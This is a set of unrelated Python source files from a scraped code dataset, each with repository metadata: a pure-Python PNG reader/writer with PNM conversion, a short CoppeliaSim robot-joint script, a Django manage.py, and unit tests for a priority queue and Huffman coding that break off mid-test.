chunks that precede the ``IDAT`` chunk are read and either
processed for metadata or discarded.
If the optional `lenient` argument evaluates to `True`, checksum
failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
if not self.atchunk:
self.atchunk = self.chunklentype()
if self.atchunk is None:
raise FormatError(
'This PNG file has no IDAT chunks.')
if self.atchunk[1] == b'IDAT':
return
self.process_chunk(lenient=lenient)
def chunklentype(self):
"""Reads just enough of the input to determine the next
chunk's length and type, returned as a (*length*, *type*) pair
where *type* is a string. If there are no more chunks, ``None``
is returned.
"""
x = self.file.read(8)
if not x:
return None
if len(x) != 8:
raise FormatError(
'End of file whilst reading chunk length and type.')
length,type = struct.unpack('!I4s', x)
if length > 2**31-1:
raise FormatError('Chunk %s is too large: %d.' % (type,length))
return length,type
def process_chunk(self, lenient=False):
"""Process the next chunk and its data. This only processes the
following chunk types, all others are ignored: ``IHDR``,
``PLTE``, ``bKGD``, ``tRNS``, ``gAMA``, ``sBIT``, ``pHYs``.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
type, data = self.chunk(lenient=lenient)
method = '_process_' + as_str(type)
m = getattr(self, method, None)
if m:
m(data)
def _process_IHDR(self, data):
# http://www.w3.org/TR/PNG/#11IHDR
if len(data) != 13:
raise FormatError('IHDR chunk has incorrect length.')
(self.width, self.height, self.bitdepth, self.color_type,
self.compression, self.filter,
self.interlace) = struct.unpack("!2I5B", data)
check_bitdepth_colortype(self.bitdepth, self.color_type)
if self.compression != 0:
raise Error("unknown compression method %d" % self.compression)
if self.filter != 0:
raise FormatError("Unknown filter method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters ."
% self.filter)
if self.interlace not in (0,1):
raise FormatError("Unknown interlace method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#8InterlaceMethods ."
% self.interlace)
# Derived values
# http://www.w3.org/TR/PNG/#6Colour-values
colormap = bool(self.color_type & 1)
greyscale = not (self.color_type & 2)
alpha = bool(self.color_type & 4)
color_planes = (3,1)[greyscale or colormap]
planes = color_planes + alpha
self.colormap = colormap
self.greyscale = greyscale
self.alpha = alpha
self.color_planes = color_planes
self.planes = planes
self.psize = float(self.bitdepth)/float(8) * planes
if int(self.psize) == self.psize:
self.psize = int(self.psize)
self.row_bytes = int(math.ceil(self.width * self.psize))
# Stores PLTE chunk if present, and is used to check
# chunk ordering constraints.
self.plte = None
# Stores tRNS chunk if present, and is used to check chunk
# ordering constraints.
self.trns = None
# Stores sbit chunk if present.
self.sbit = None
def _process_PLTE(self, data):
# http://www.w3.org/TR/PNG/#11PLTE
if self.plte:
warnings.warn("Multiple PLTE chunks present.")
self.plte = data
if len(data) % 3 != 0:
raise FormatError(
"PLTE chunk's length should be a multiple of 3.")
if len(data) > (2**self.bitdepth)*3:
raise FormatError("PLTE chunk is too long.")
if len(data) == 0:
raise FormatError("Empty PLTE is not allowed.")
def _process_bKGD(self, data):
try:
if self.colormap:
if not self.plte:
warnings.warn(
"PLTE chunk is required before bKGD chunk.")
self.background = struct.unpack('B', data)
else:
self.background = struct.unpack("!%dH" % self.color_planes,
data)
except struct.error:
raise FormatError("bKGD chunk has incorrect length.")
def _process_tRNS(self, data):
# http://www.w3.org/TR/PNG/#11tRNS
self.trns = data
if self.colormap:
if not self.plte:
warnings.warn("PLTE chunk is required before tRNS chunk.")
else:
if len(data) > len(self.plte)/3:
# Was warning, but promoted to Error as it
# would otherwise cause pain later on.
raise FormatError("tRNS chunk is too long.")
else:
if self.alpha:
raise FormatError(
"tRNS chunk is not valid with colour type %d." %
self.color_type)
try:
self.transparent = \
struct.unpack("!%dH" % self.color_planes, data)
except struct.error:
raise FormatError("tRNS chunk has incorrect length.")
def _process_gAMA(self, data):
try:
self.gamma = struct.unpack("!L", data)[0] / 100000.0
except struct.error:
raise FormatError("gAMA chunk has incorrect length.")
def _process_sBIT(self, data):
self.sbit = data
if (self.colormap and len(data) != 3 or
not self.colormap and len(data) != self.planes):
raise FormatError("sBIT chunk has incorrect length.")
def _process_pHYs(self, data):
# http://www.w3.org/TR/PNG/#11pHYs
self.phys = data
fmt = "!LLB"
if len(data) != struct.calcsize(fmt):
raise FormatError("pHYs chunk has incorrect length.")
self.x_pixels_per_unit, self.y_pixels_per_unit, unit = struct.unpack(fmt,data)
self.unit_is_meter = bool(unit)
def read(self, lenient=False):
"""
Read the PNG file and decode it. Returns (`width`, `height`,
`pixels`, `metadata`).
May use excessive memory.
`pixels` are returned in boxed row flat pixel format.
If the optional `lenient` argument evaluates to True,
checksum failures will raise warnings rather than exceptions.
"""
def iteridat():
"""Iterator that yields all the ``IDAT`` chunks as strings."""
while True:
try:
type, data = self.chunk(lenient=lenient)
except ValueError as e:
raise ChunkError(e.args[0])
if type == b'IEND':
# http://www.w3.org/TR/PNG/#11IEND
break
if type != b'IDAT':
continue
# type == b'IDAT'
# http://www.w3.org/TR/PNG/#11IDAT
if self.colormap and not self.plte:
warnings.warn("PLTE chunk is required before IDAT chunk")
yield data
def iterdecomp(idat):
"""Iterator that yields decompressed strings. `idat` should
be an iterator that yields the ``IDAT`` chunk data.
"""
# Currently, with no max_length parameter to decompress,
# this routine will do one yield per IDAT chunk: Not very
# incremental.
d = zlib.decompressobj()
# Each IDAT chunk is passed to the decompressor, then any
# remaining state is decompressed out.
for data in idat:
# :todo: add a max_length argument here to limit output
# size.
yield array('B', d.decompress(data))
yield array('B', d.flush())
self.preamble(lenient=lenient)
raw = iterdecomp(iteridat())
if self.interlace:
raw = array('B', itertools.chain(*raw))
arraycode = 'BH'[self.bitdepth>8]
# Like :meth:`group` but producing an array.array object for
# each row.
pixels = map(lambda *row: array(arraycode, row),
*[iter(self.deinterlace(raw))]*self.width*self.planes)
else:
pixels = self.iterboxed(self.iterstraight(raw))
meta = dict()
for attr in 'greyscale alpha planes bitdepth interlace'.split():
meta[attr] = getattr(self, attr)
meta['size'] = (self.width, self.height)
for attr in 'gamma transparent background'.split():
a = getattr(self, attr, None)
if a is not None:
meta[attr] = a
if self.plte:
meta['palette'] = self.palette()
return self.width, self.height, pixels, meta
def read_flat(self):
"""
Read a PNG file and decode it into flat row flat pixel format.
Returns (*width*, *height*, *pixels*, *metadata*).
May use excessive memory.
`pixels` are returned in flat row flat pixel format.
See also the :meth:`read` method which returns pixels in the
more stream-friendly boxed row flat pixel format.
"""
x, y, pixel, meta = self.read()
arraycode = 'BH'[meta['bitdepth']>8]
pixel = array(arraycode, itertools.chain(*pixel))
return x, y, pixel, meta
def palette(self, alpha='natural'):
"""Returns a palette that is a sequence of 3-tuples or 4-tuples,
synthesizing it from the ``PLTE`` and ``tRNS`` chunks. These
chunks should have already been processed (for example, by
calling the :meth:`preamble` method). All the tuples are the
same size: 3-tuples if there is no ``tRNS`` chunk, 4-tuples when
there is a ``tRNS`` chunk. Assumes that the image is colour type
3 and therefore a ``PLTE`` chunk is required.
If the `alpha` argument is ``'force'`` then an alpha channel is
always added, forcing the result to be a sequence of 4-tuples.
"""
if not self.plte:
raise FormatError(
"Required PLTE chunk is missing in colour type 3 image.")
plte = group(array('B', self.plte), 3)
if self.trns or alpha == 'force':
trns = array('B', self.trns or '')
trns.extend([255]*(len(plte)-len(trns)))
plte = list(map(operator.add, plte, group(trns, 1)))
return plte
def asDirect(self):
"""Returns the image data as a direct representation of an
``x * y * planes`` array. This method is intended to remove the
need for callers to deal with palettes and transparency
themselves. Images with a palette (colour type 3)
are converted to RGB or RGBA; images with transparency (a
``tRNS`` chunk) are converted to LA or RGBA as appropriate.
When returned in this format the pixel values represent the
colour value directly without needing to refer to palettes or
transparency information.
Like the :meth:`read` method this method returns a 4-tuple:
(*width*, *height*, *pixels*, *meta*)
This method normally returns pixel values with the bit depth
they have in the source image, but when the source PNG has an
``sBIT`` chunk it is inspected and can reduce the bit depth of
the result pixels; pixel values will be reduced according to
the bit depth specified in the ``sBIT`` chunk (PNG nerds should
note a single result bit depth is used for all channels; the
maximum of the ones specified in the ``sBIT`` chunk. An RGB565
image will be rescaled to 6-bit RGB666).
The *meta* dictionary that is returned reflects the `direct`
format and not the original source image. For example, an RGB
source image with a ``tRNS`` chunk to represent a transparent
colour, will have ``planes=3`` and ``alpha=False`` for the
source image, but the *meta* dictionary returned by this method
will have ``planes=4`` and ``alpha=True`` because an alpha
channel is synthesized and added.
*pixels* is the pixel data in boxed row flat pixel format (just
like the :meth:`read` method).
All the other aspects of the image data are not changed.
"""
self.preamble()
# Simple case, no conversion necessary.
if not self.colormap and not self.trns and not self.sbit:
return self.read()
x,y,pixels,meta = self.read()
if self.colormap:
meta['colormap'] = False
meta['alpha'] = bool(self.trns)
meta['bitdepth'] = 8
meta['planes'] = 3 + bool(self.trns)
plte = self.palette()
def iterpal(pixels):
for row in pixels:
row = [plte[x] for x in row]
yield array('B', itertools.chain(*row))
pixels = iterpal(pixels)
elif self.trns:
# It would be nice if there was some reasonable way
# of doing this without generating a whole load of
# intermediate tuples. But tuples does seem like the
# easiest way, with no other way clearly much simpler or
# much faster. (Actually, the L to LA conversion could
# perhaps go faster (all those 1-tuples!), but I still
# wonder whether the code proliferation is worth it)
it = self.transparent
maxval = 2**meta['bitdepth']-1
planes = meta['planes']
meta['alpha'] = True
meta['planes'] += 1
typecode = 'BH'[meta['bitdepth']>8]
def itertrns(pixels):
for row in pixels:
# For each row we group it into pixels, then form a
# characterisation vector that says whether each
# pixel is opaque or not. Then we convert
# True/False to 0/maxval (by multiplication),
# and add it as the extra channel.
row = group(row, planes)
opa = map(it.__ne__, row)
opa = map(maxval.__mul__, opa)
opa = list(zip(opa)) # convert to 1-tuples
yield array(typecode,
itertools.chain(*map(operator.add, row, opa)))
pixels = itertrns(pixels)
targetbitdepth = None
if self.sbit:
sbit = struct.unpack('%dB' % len(self.sbit), self.sbit)
targetbitdepth = max(sbit)
if targetbitdepth > meta['bitdepth']:
raise Error('sBIT chunk %r exceeds bitdepth %d' %
(sbit,self.bitdepth))
if min(sbit) <= 0:
raise Error('sBIT chunk %r has a 0-entry' % sbit)
if targetbitdepth == meta['bitdepth']:
targetbitdepth = None
if targetbitdepth:
shift = meta['bitdepth'] - targetbitdepth
meta['bitdepth'] = targetbitdepth
def itershift(pixels):
for row in pixels:
yield [p >> shift for p in row]
pixels = itershift(pixels)
return x,y,pixels,meta
def asFloat(self, maxval=1.0):
"""Return image pixels as per :meth:`asDirect` method, but scale
all pixel values to be floating point values between 0.0 and
*maxval*.
"""
x,y,pixels,info = self.asDirect()
sourcemaxval = 2**info['bitdepth']-1
del info['bitdepth']
info['maxval'] = float(maxval)
factor = float(maxval)/float(sourcemaxval)
def iterfloat():
for row in pixels:
yield [factor * p for p in row]
return x,y,iterfloat(),info
def _as_rescale(self, get, targetbitdepth):
"""Helper used by :meth:`asRGB8` and :meth:`asRGBA8`."""
width,height,pixels,meta = get()
maxval = 2**meta['bitdepth'] - 1
targetmaxval = 2**targetbitdepth - 1
factor = float(targetmaxval) / float(maxval)
meta['bitdepth'] = targetbitdepth
def iterscale():
for row in pixels:
yield [int(round(x*factor)) for x in row]
if maxval == targetmaxval:
return width, height, pixels, meta
else:
return width, height, iterscale(), meta
def asRGB8(self):
"""Return the image data as an RGB pixels with 8-bits per
sample. This is like the :meth:`asRGB` method except that
this method additionally rescales the values so that they
are all between 0 and 255 (8-bit). In the case where the
source image has a bit depth < 8 the transformation preserves
all the information; where the source image has bit depth
> 8, then rescaling to 8-bit values loses precision. No
dithering is performed. Like :meth:`asRGB`, an alpha channel
in the source image will raise an exception.
This function returns a 4-tuple:
(*width*, *height*, *pixels*, *metadata*).
*width*, *height*, *metadata* are as per the
:meth:`read` method.
*pixels* is the pixel data in boxed row flat pixel format.
"""
return self._as_rescale(self.asRGB, 8)
def asRGBA8(self):
"""Return the image data as RGBA pixels with 8-bits per
sample. This method is similar to :meth:`asRGB8` and
:meth:`asRGBA`: The result pixels have an alpha channel, *and*
values are rescaled to the range 0 to 255. The alpha channel is
synthesized if necessary (with a small speed penalty).
"""
return self._as_rescale(self.asRGBA, 8)
def asRGB(self):
"""Return image as RGB pixels. RGB colour images are passed
through unchanged; greyscales are expanded into RGB
triplets (there is a small speed overhead for doing this).
An alpha channel in the source image will raise an
exception.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha']:
raise Error("will not convert image with alpha channel to RGB")
if not meta['greyscale']:
return width,height,pixels,meta
meta['greyscale'] = False
typecode = 'BH'[meta['bitdepth'] > 8]
def iterrgb():
for row in pixels:
a = array(typecode, [0]) * 3 * width
for i in range(3):
a[i::3] = row
yield a
return width,height,iterrgb(),meta
def asRGBA(self):
"""Return image as RGBA pixels. Greyscales are expanded into
RGB triplets; an alpha channel is synthesized if necessary.
The return values are as for the :meth:`read` method
except that the *metadata* reflect the returned pixels, not the
source image. In particular, for this method
``metadata['greyscale']`` will be ``False``, and
``metadata['alpha']`` will be ``True``.
"""
width,height,pixels,meta = self.asDirect()
if meta['alpha'] and not meta['greyscale']:
return width,height,pixels,meta
typecode = 'BH'[meta['bitdepth'] > 8]
maxval = 2**meta['bitdepth'] - 1
maxbuffer = struct.pack('=' + typecode, maxval) * 4 * width
def newarray():
return array(typecode, maxbuffer)
if meta['alpha'] and meta['greyscale']:
# LA to RGBA
def convert():
for row in pixels:
# Create a fresh target row, then copy L channel
# into first three target channels, and A channel
# into fourth channel.
a = newarray()
pngfilters.convert_la_to_rgba(row, a)
yield a
elif meta['greyscale']:
# L to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_l_to_rgba(row, a)
yield a
else:
assert not meta['alpha'] and not meta['greyscale']
# RGB to RGBA
def convert():
for row in pixels:
a = newarray()
pngfilters.convert_rgb_to_rgba(row, a)
yield a
meta['alpha'] = True
meta['greyscale'] = False
return width,height,convert(),meta
def check_bitdepth_colortype(bitdepth, colortype):
"""Check that `bitdepth` and `colortype` are both valid,
and specified in a valid combination. Returns if valid,
raise an Exception if not valid.
"""
if bitdepth not in (1,2,4,8,16):
raise FormatError("invalid bit depth %d" % bitdepth)
if colortype not in (0,2,3,4,6):
raise FormatError("invalid colour type %d" % colortype)
# Check indexed (palettized) images have 8 or fewer bits
# per pixel; check only indexed or greyscale images have
# fewer than 8 bits per pixel.
if colortype & 1 and bitdepth > 8:
raise FormatError(
"Indexed images (colour type %d) cannot"
" have bitdepth > 8 (bit depth %d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
if bitdepth < 8 and colortype not in (0,3):
raise FormatError("Illegal combination of bit depth (%d)"
" and colour type (%d)."
" See http://www.w3.org/TR/2003/REC-PNG-20031110/#table111 ."
% (bitdepth, colortype))
def isinteger(x):
try:
return int(x) == x
except (TypeError, ValueError):
return False
# === Support for users without Cython ===
try:
pngfilters
except NameError:
class pngfilters(object):
def undo_filter_sub(filter_unit, scanline, previous, result):
"""Undo sub filter."""
ai = 0
# Loops starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(filter_unit, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
undo_filter_sub = staticmethod(undo_filter_sub)
def undo_filter_up(filter_unit, scanline, previous, result):
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
undo_filter_up = staticmethod(undo_filter_up)
def undo_filter_average(filter_unit, scanline, previous, result):
"""Undo up filter."""
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
undo_filter_average = staticmethod(undo_filter_average)
def undo_filter_paeth(filter_unit, scanline, previous, result):
"""Undo Paeth filter."""
# Also used for ci.
ai = -filter_unit
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
undo_filter_paeth = staticmethod(undo_filter_paeth)
def convert_la_to_rgba(row, result):
for i in range(3):
result[i::4] = row[0::2]
result[3::4] = row[1::2]
convert_la_to_rgba = staticmethod(convert_la_to_rgba)
def convert_l_to_rgba(row, result):
"""Convert a grayscale image to RGBA. This method assumes
the alpha channel in result is already correctly
initialized.
"""
for i in range(3):
result[i::4] = row
convert_l_to_rgba = staticmethod(convert_l_to_rgba)
def convert_rgb_to_rgba(row, result):
"""Convert an RGB image to RGBA. This method assumes the
alpha channel in result is already correctly initialized.
"""
for i in range(3):
result[i::4] = row[i::3]
convert_rgb_to_rgba = staticmethod(convert_rgb_to_rgba)
# === Command Line Support ===
def read_pam_header(infile):
"""
Read (the rest of a) PAM header. `infile` should be positioned
immediately after the initial 'P7' line (at the beginning of the
second line). Returns are as for `read_pnm_header`.
"""
# Unlike PBM, PGM, and PPM, we can read the header a line at a time.
header = dict()
while True:
l = infile.readline().strip()
if l == b'ENDHDR':
break
if not l:
raise EOFError('PAM ended prematurely')
if l[0] == b'#':
continue
l = l.split(None, 1)
if l[0] not in header:
header[l[0]] = l[1]
else:
header[l[0]] += b' ' + l[1]
required = [b'WIDTH', b'HEIGHT', b'DEPTH', b'MAXVAL']
WIDTH,HEIGHT,DEPTH,MAXVAL = required
present = [x for x in required if x in header]
if len(present) != len(required):
raise Error('PAM file must specify WIDTH, HEIGHT, DEPTH, and MAXVAL')
width = int(header[WIDTH])
height = int(header[HEIGHT])
depth = int(header[DEPTH])
maxval = int(header[MAXVAL])
if (width <= 0 or
height <= 0 or
depth <= 0 or
maxval <= 0):
raise Error(
'WIDTH, HEIGHT, DEPTH, MAXVAL must all be positive integers')
return 'P7', width, height, depth, maxval
def read_pnm_header(infile, supported=(b'P5', b'P6')):
"""
Read a PNM header, returning (format,width,height,depth,maxval).
`width` and `height` are in pixels. `depth` is the number of
channels in the image; for PBM and PGM it is synthesized as 1, for
PPM as 3; for PAM images it is read from the header. `maxval` is
synthesized (as 1) for PBM images.
"""
# Generally, see http://netpbm.sourceforge.net/doc/ppm.html
# and http://netpbm.sourceforge.net/doc/pam.html
# Technically 'P7' must be followed by a newline, so by using
# rstrip() we are being liberal in what we accept. I think this
# is acceptable.
type = infile.read(3).rstrip()
if type not in supported:
raise NotImplementedError('file format %s not supported' % type)
if type == b'P7':
# PAM header parsing is completely different.
return read_pam_header(infile)
# Expected number of tokens in header (3 for P4, 4 for P6)
expected = 4
pbm = (b'P1', b'P4')
if type in pbm:
expected = 3
header = [type]
# We have to read the rest of the header byte by byte because the
# final whitespace character (immediately following the MAXVAL in
# the case of P6) may not be a newline. Of course all PNM files in
# the wild use a newline at this point, so it's tempting to use
# readline; but it would be wrong.
def getc():
c = infile.read(1)
if not c:
raise Error('premature EOF reading PNM header')
return c
c = getc()
while True:
# Skip whitespace that precedes a token.
while c.isspace():
c = getc()
# Skip comments.
while c == '#':
while c not in b'\n\r':
c = getc()
if not c.isdigit():
raise Error('unexpected character %s found in header' % c)
# According to the specification it is legal to have comments
# that appear in the middle of a token.
# This is bonkers; I've never seen it; and it's a bit awkward to
# code good lexers in Python (no goto). So we break on such
# cases.
token = b''
while c.isdigit():
token += c
c = getc()
# Slight hack. All "tokens" are decimal integers, so convert
# them here.
header.append(int(token))
if len(header) == expected:
break
# Skip comments (again)
while c == '#':
while c not in '\n\r':
c = getc()
if not c.isspace():
raise Error('expected header to end with whitespace, not %s' % c)
if type in pbm:
# synthesize a MAXVAL
header.append(1)
depth = (1,3)[type == b'P6']
return header[0], header[1], header[2], depth, header[3]
def write_pnm(file, width, height, pixels, meta):
"""Write a Netpbm PNM/PAM file.
"""
bitdepth = meta['bitdepth']
maxval = 2**bitdepth - 1
# Rudely, the number of image planes can be used to determine
# whether we are L (PGM), LA (PAM), RGB (PPM), or RGBA (PAM).
planes = meta['planes']
# Can be an assert as long as we assume that pixels and meta came
# from a PNG file.
assert planes in (1,2,3,4)
if planes in (1,3):
if 1 == planes:
# PGM
# Could generate PBM if maxval is 1, but we don't (for one
# thing, we'd have to convert the data, not just blat it
# out).
fmt = 'P5'
else:
# PPM
fmt = 'P6'
header = '%s %d %d %d\n' % (fmt, width, height, maxval)
if planes in (2,4):
# PAM
# See http://netpbm.sourceforge.net/doc/pam.html
if 2 == planes:
tupltype = 'GRAYSCALE_ALPHA'
else:
tupltype = 'RGB_ALPHA'
header = ('P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\n'
'TUPLTYPE %s\nENDHDR\n' %
(width, height, planes, maxval, tupltype))
file.write(header.encode('ascii'))
# Values per row
vpr = planes * width
# struct format
fmt = '>%d' % vpr
if maxval > 0xff:
fmt = fmt + 'H'
else:
fmt = fmt + 'B'
for row in pixels:
file.write(struct.pack(fmt, *row))
file.flush()
def color_triple(color):
"""
Convert a command line colour value to a RGB triple of integers.
FIXME: Somewhere we need support for greyscale backgrounds etc.
"""
if color.startswith('#') and len(color) == 4:
return (int(color[1], 16),
int(color[2], 16),
int(color[3], 16))
if color.startswith('#') and len(color) == 7:
return (int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16))
elif color.startswith('#') and len(color) == 13:
return (int(color[1:5], 16),
int(color[5:9], 16),
int(color[9:13], 16))
def _add_common_options(parser):
"""Call *parser.add_option* for each of the options that are
common between this PNG--PNM conversion tool and the gen
tool.
"""
parser.add_option("-i", "--interlace",
default=False, action="store_true",
help="create an interlaced PNG file (Adam7)")
parser.add_option("-t", "--transparent",
action="store", type="string", metavar="#RRGGBB",
help="mark the specified colour as transparent")
parser.add_option("-b", "--background",
action="store", type="string", metavar="#RRGGBB",
help="save the specified background colour")
parser.add_option("-g", "--gamma",
action="store", type="float", metavar="value",
help="save the specified gamma value")
parser.add_option("-c", "--compression",
action="store", type="int", metavar="level",
help="zlib compression level (0-9)")
return parser
def _main(argv):
"""
Run the PNG encoder with options from the command line.
"""
# Parse command line arguments
from optparse import OptionParser
version = '%prog ' + __version__
parser = OptionParser(version=version)
parser.set_usage("%prog [options] [imagefile]")
parser.add_option('-r', '--read-png', default=False,
action='store_true',
help='Read PNG, write PNM')
parser.add_option("-a", "--alpha",
action="store", type="string", metavar="pgmfile",
help="alpha channel transparency (RGBA)")
_add_common_options(parser)
(options, args) = parser.parse_args(args=argv[1:])
# Convert options
if options.transparent is not None:
options.transparent = color_triple(options.transparent)
if options.background is not None:
options.background = color_triple(options.background)
# Prepare input and output files
if len(args) == 0:
infilename = '-'
infile = sys.stdin
elif len(args) == 1:
infilename = args[0]
infile = open(infilename, 'rb')
else:
parser.error("more than one input file")
outfile = sys.stdout
if sys.platform == "win32":
import msvcrt, os
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
if options.read_png:
# Encode PNG to PPM
png = Reader(file=infile)
width,height,pixels,meta = png.asDirect()
write_pnm(outfile, width, height, pixels, meta)
else:
# Encode PNM to PNG
format, width, height, depth, maxval = \
read_pnm_header(infile, (b'P5',b'P6',b'P7'))
# When it comes to the variety of input formats, we do something
# rather rude. Observe that L, LA, RGB, RGBA are the 4 colour
# types supported by PNG and that they correspond to 1, 2, 3, 4
# channels respectively. So we use the number of channels in
# the source image to determine which one we have. We do not
# care about TUPLTYPE.
greyscale = depth <= 2
pamalpha = depth in (2,4)
supported = [2**x-1 for x in range(1,17)]
try:
mi = supported.index(maxval)
except ValueError:
raise NotImplementedError(
'your maxval (%s) not in supported list %s' %
(maxval, str(supported)))
bitdepth = mi+1
writer = Writer(width, height,
greyscale=greyscale,
bitdepth=bitdepth,
interlace=options.interlace,
transparent=options.transparent,
background=options.background,
alpha=bool(pamalpha or options.alpha),
gamma=options.gamma,
compression=options.compression)
if options.alpha:
pgmfile = open(options.alpha, 'rb')
format, awidth, aheight, adepth, amaxval = \
read_pnm_header(pgmfile, 'P5')
if amaxval != '255':
raise NotImplementedError(
'maxval %s not supported for alpha channel' % amaxval)
if (awidth, aheight) != (width, height):
raise ValueError("alpha channel image size mismatch"
" (%s has %sx%s but %s has %sx%s)"
% (infilename, width, height,
options.alpha, awidth, aheight))
writer.convert_ppm_and_pgm(infile, pgmfile, outfile)
else:
writer.convert_pnm(infile, outfile)
if __name__ == '__main__':
try:
_main(sys.argv)
except Error as e:
print(e, file=sys.stderr)
|
[
"entrpntr@gmail.com"
] |
entrpntr@gmail.com
|
52504bfe4f3f300a1e07ec19a204f2147359d96e
|
f1f0f4f856c496be221031da4b8f8ccbf9633263
|
/hello_world.py
|
f0956210847cd4ef3cc4710d6ae0fe61ffeca60f
|
[] |
no_license
|
guitartsword/robot-test
|
a4fe0d712e0015350faf3647bb84bdec94d00048
|
0ec83e7a46fbed9a4a2ff95cc5c8843205f96de1
|
refs/heads/main
| 2023-04-12T15:57:38.097123
| 2021-05-07T07:01:16
| 2021-05-07T07:01:16
| 365,143,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 617
|
py
|
import sim
import math
import time
SERVER_ADDRESS = '127.0.0.1'
PORT = 10009
# PORT = 19999
# Cerrar todas las conecciones por si acaso
sim.simxFinish(-1)
# Conectarse a Coppelia Sim
client_id = sim.simxStart(SERVER_ADDRESS, PORT, True, True, 5000, 5)
if client_id == -1:
print('No se pudo conectar')
# Obtener el axis
AXIS_NAME = 'MTB_axis1#1'
ret,axis=sim.simxGetObjectHandle(client_id, AXIS_NAME, sim.simx_opmode_blocking)
# Mover el axis
value_degree = 180
value_radians = math.radians(value_degree)
sim.simxSetJointTargetPosition(client_id, axis, value_radians, sim.simx_opmode_oneshot)
time.sleep(1)
|
[
"guitartsword@gmail.com"
] |
guitartsword@gmail.com
|
20862d69a7cc2ae87501cca23cc5706c63629912
|
07c131afa3426b7c511f11c247a005bbe0bc21ce
|
/src/manage.py
|
c58f18e48e3c72144dd995df5385b6c9c4f4c2bc
|
[] |
no_license
|
arindamdas612/labelizer
|
85fba02b2496a5783d5315bb80f0e32f1947268c
|
9f12c61bd3ec9ca476999e2c678bd5564e12d5ba
|
refs/heads/master
| 2022-12-01T18:29:45.873715
| 2020-07-13T15:32:38
| 2020-07-13T15:32:38
| 245,465,599
| 0
| 0
| null | 2022-11-22T05:22:32
| 2020-03-06T16:18:43
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 629
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'labelizer.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"arindamdas@Arindams-MacBook-Air.local"
] |
arindamdas@Arindams-MacBook-Air.local
|
e274b53ba1f53871673d32e9cc678f0f42fd2f7c
|
b88040d1d00d025de1fa96eac8af2d324291e6a2
|
/Assignment4/Assignment_4Tests.py
|
ee3bb0c077fd3ae619071679f0b2b92ae6630329
|
[] |
no_license
|
brianphan90/CPE202
|
5a1f59d4b20496e35bddc3e597a51d64fe829758
|
fe2bb58a8f177d32690b1fd1298125f684f3c0d6
|
refs/heads/master
| 2020-03-09T21:46:12.062397
| 2018-11-30T08:15:39
| 2018-11-30T08:15:39
| 129,018,017
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,745
|
py
|
from priorityqueue import *
from huffman import *
import unittest
class Asg4(unittest.TestCase):
def test_priorityqueue_1(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
def test_priorityqueue_2(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZZZ', -10)
self.assertEqual(pq.front(), 'z')
def test_priorityqueue_3(self):
pq = PriorityQueue()
pq.enqueue('a', 0)
self.assertEqual(pq.front(), 'a')
pq.enqueue('b', 5)
self.assertEqual(pq.front(), 'b')
pq.enqueue('z', 100)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'z')
pq.enqueue('ZZZZ', 1000)
def test_priorityqueue_4(self):
pq = PriorityQueue()
pq.enqueue('ZZ', -1)
self.assertEqual(pq.front(), 'ZZ')
pq.enqueue('ZZZZ', 1000)
self.assertEqual(pq.dequeue(), 'ZZZZ')
def test_priorityqueue_5(self):
pq = PriorityQueue()
pq.enqueue(list(), -1)
self.assertEqual(pq.front(), [])
pq.enqueue(tuple([1,2,3]), 1000); pq.enqueue('bbc', 1000)
pq.enqueue(int('78'), 1000000)
self.assertEqual(pq.dequeue(), 78)
def test_huffman_1(self):
sent = 'aaaaggccttt'; codes = dict(); root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'a': '0', 'g': '111', 'c': '110', 't': '10'})
def test_huffman_2(self):
sent = 'asdf;k;lkjasdfk dasiirFFDg'; codes = dict(); root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, \
